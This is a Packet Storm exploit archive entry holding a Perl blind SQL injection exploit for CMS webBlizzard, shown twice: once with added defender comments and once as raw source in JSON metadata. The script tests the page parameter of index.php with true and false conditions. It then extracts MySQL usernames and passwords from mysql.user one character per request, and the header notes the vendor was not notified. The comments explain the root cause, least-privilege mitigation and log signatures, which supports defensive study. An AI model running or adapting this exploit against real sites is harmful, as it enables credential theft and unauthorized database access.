ID PACKETSTORM:67982
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2008-07-10T00:00:00
Description
`#/usr/bin/perl
#|+| Vendor Not Notified
#|+| Author: Bl@ckbe@rD
#|+| Discovered On: 10 june 2008
#|+| greetz: InjEctOrs , underz0ne crew
#--//-->
# -- CMS webBlizzard Blind SQL Injection Exploit --
#--//--> Exploit :
use strict;
use LWP::Simple;
# Banner output only; it has no effect on the requests sent later.
print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";
print "- -\n";
print "- -\n";
print "- -\n";
print "- CMS WebBlizzard Blind SQL Injection exploit -\n";
print "- -\n";
print "- -\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";
# Interactive driver: the base URL is read from STDIN and used, unmodified, as
# the prefix of every request path built by inject_test() and blind().
print "\nEnter URL (ie: http://site.com): ";
chomp(my $url=<STDIN>);
# inject_test() either returns 1 or terminates the process itself, so this
# branch is the only path that reaches blind().
if(inject_test($url)) {
print "Injecting.. Please Wait this could take several minutes..\n\n";
# blind() recovers its result one character at a time, one HTTP request per
# guess, which is why the message above mentions a run of several minutes.
# For responders: that request volume is the main artefact left in web logs.
my $details = blind($url);
print "Exploit Success! Admin Details: ".$details;
exit;
}
# blind($url) -- boolean-based blind extraction loop.
#
# Takes the base URL and returns the string accumulated in $res (which stays
# undef if the terminator is matched before any character was appended).
#
# Each iteration sends one GET to /index.php in which the `page` parameter
# carries a closing parenthesis, an AND condition comparing
# ascii(substring(<subquery>, position, 1)) with a candidate code, and a
# trailing `/*` that comments out the rest of the original statement. The
# subquery reads username and password from mysql.user, joined by 0x3a (':')
# and terminated by 0x5E ('^').
#
# Defender notes:
#  - Root cause, presumably: `page` is concatenated into a parenthesised SQL
#    expression without integer casting or bound parameters -- confirm against
#    the application source. Casting `page` to an integer or using a prepared
#    statement removes the injection point.
#  - The subquery only works when the application's database account can read
#    the mysql system schema; a least-privilege account limited to the CMS
#    schema blocks this particular read even while the injection is unpatched.
#  - Detection: look for index.php requests whose `page` value contains
#    `ascii(substring(`, `mysql.user` or a trailing `/*`, arriving as a long
#    series from one client with only the two trailing integers changing.
sub blind {
my $url = shift;
my $res = undef;
# Candidate character code for the current position; 48 is ASCII '0', so
# lower codes are never requested.
my $chr = 48;
# 1-based character position passed to substring().
my $substr = 1;
# Loop flag: despite the name, 1 means "keep going" and 0 means finished.
my $done = 1;
while($done) {
# One request per (position, candidate) pair. The string literal below spans
# two source lines and is left exactly as published.
my $content = get($url."/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM
mysql.user),".$substr.",1))=".$chr."/*");
# The word "Previous" in the response body is used as the "condition was true"
# marker -- presumably text that appears only when the page renders normally.
# 94 is '^' (0x5E), the sentinel appended by CONCAT, so a match on it ends the run.
if($content =~ /Previous/ && $chr == 94) { $done = 0; }
# A match on any other code: record the character, advance one position and
# restart the candidate at 48.
elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
# No match: try the next code. The candidate rises by one per request with no
# ceiling in this loop, so a run appears in access logs as near-identical
# requests whose last integer counts upward.
else { $chr++; }
}
return $res;
}
# inject_test($url) -- differential probe run before any extraction.
#
# Sends two GET requests to /index.php that differ only in the condition
# appended to page=6: an always-true one (1=1) and an always-false one (1=2),
# each followed by `/*`. The target is reported as injectable when the word
# "Previous" is present in the first response and absent from the second.
#
# Returns 1 in that case. In every other case it prints a message and
# terminates the process, so it never returns a false value to the caller.
#
# Defender notes:
#  - Two back-to-back requests to the same path that differ only in `1=1`
#    versus `1=2` are a common probe signature and are worth a log or WAF rule
#    on their own.
#  - After a fix, both requests should produce the same response; that makes
#    this pair usable as a regression check on a system you operate.
sub inject_test {
my $url = shift;
# Baseline: condition that is always true.
my $true = get($url."/index.php?page=6) and 1=1 /*");
# Control: condition that is always false.
my $false = get($url."/index.php?page=6) and 1=2 /*");
# The response only differs between the two when the appended condition is
# being evaluated by the database.
if($true =~ /Previous/ && $false !~ /Previous/) {
print "\nTarget Site Vulnerable!\n\n";
return 1;
# Any other combination, including both requests failing, ends the script here.
} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
}
`
{"id": "PACKETSTORM:67982", "type": "packetstorm", "bulletinFamily": "exploit", "title": "cmswebblizzard-sql.txt", "description": "", "published": "2008-07-10T00:00:00", "modified": "2008-07-10T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/67982/cmswebblizzard-sql.txt.html", "reporter": "Bl@ckbe@rd", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:20:26", "viewCount": 1, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2016-11-03T10:20:26", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:20:26", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/67982/cmswebblizzard-sql.txt", "sourceData": "`#/usr/bin/perl \n \n#|+| Vendor Not Notified \n#|+| Author: Bl@ckbe@rD \n#|+| Discovered On: 10 june 2008 \n#|+| greetz: InjEctOrs , underz0ne crew \n#--//--> \n# -- CMS webBlizzard Blind SQL Injection Exploit -- \n#--//--> Exploit : \nuse strict; \nuse LWP::Simple; \n \nprint \"-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"- CMS WebBlizzard Blind SQL Injection exploit -\\n\"; \nprint \"- -\\n\"; \nprint \"- -\\n\"; \nprint \"+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\\n\"; \n \nprint \"\\nEnter URL (ie: http://site.com): \"; \nchomp(my $url=<STDIN>); \n \nif(inject_test($url)) { \nprint \"Injecting.. Please Wait this could take several minutes..\\n\\n\"; \nmy $details = blind($url); \nprint \"Exploit Success! 
Admin Details: \".$details; \nexit; \n} \n \nsub blind { \n \nmy $url = shift; \nmy $res = undef; \nmy $chr = 48; \nmy $substr = 1; \nmy $done = 1; \n \nwhile($done) { \nmy $content = get($url.\"/index.php?page=6) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM \nmysql.user),\".$substr.\",1))=\".$chr.\"/*\"); \n \nif($content =~ /Previous/ && $chr == 94) { $done = 0; } \nelsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } \nelse { $chr++; } \n} \nreturn $res; \n} \n \nsub inject_test { \n \nmy $url = shift; \nmy $true = get($url.\"/index.php?page=6) and 1=1 /*\"); \nmy $false = get($url.\"/index.php?page=6) and 1=2 /*\"); \n \nif($true =~ /Previous/ && $false !~ /Previous/) { \nprint \"\\nTarget Site Vulnerable!\\n\\n\"; \nreturn 1; \n} else { print \"\\nTarget Site Not Vulnerable! Exiting..\\n\"; exit; } \n} \n`\n"}
{}